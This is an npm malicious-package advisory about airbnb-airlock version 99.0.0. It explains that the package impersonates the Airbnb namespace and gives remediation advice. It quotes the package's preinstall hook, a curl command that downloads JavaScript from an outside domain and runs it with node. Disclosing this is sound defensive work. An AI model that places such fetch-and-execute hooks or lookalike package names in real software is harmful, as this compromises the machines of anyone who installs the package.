npm · Malicious package advisory
Malwareairbnb-airlock
MAL-2026-6293
Malicious code in airbnb-airlock (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (034fd98a2ccd98f2bec2201d130c5a102ad17907c37af34b5162592e26a0fd43)
The package's preinstall lifecycle hook in package.json runs `curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js`, fetching an unpinned JavaScript file from poc.amanrawat.com and immediately executing it with node during `npm install`. The fetched content is mutable and entirely controlled by the operator of that domain — installers run whatever bytes are served at install time, with no hash or signature verification. The package ships no other functional content; the remote fetch-and-execute is its only behavior. The package name uses the 'airbnb-' prefix to impersonate the Airbnb open-source namespace while being published by an unrelated author with a placeholder description ('Test') and an inflated version (99.0.0), consistent with namespace impersonation intended to lure installers searching for Airbnb tooling.
Compromised versions (1)
- 99.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.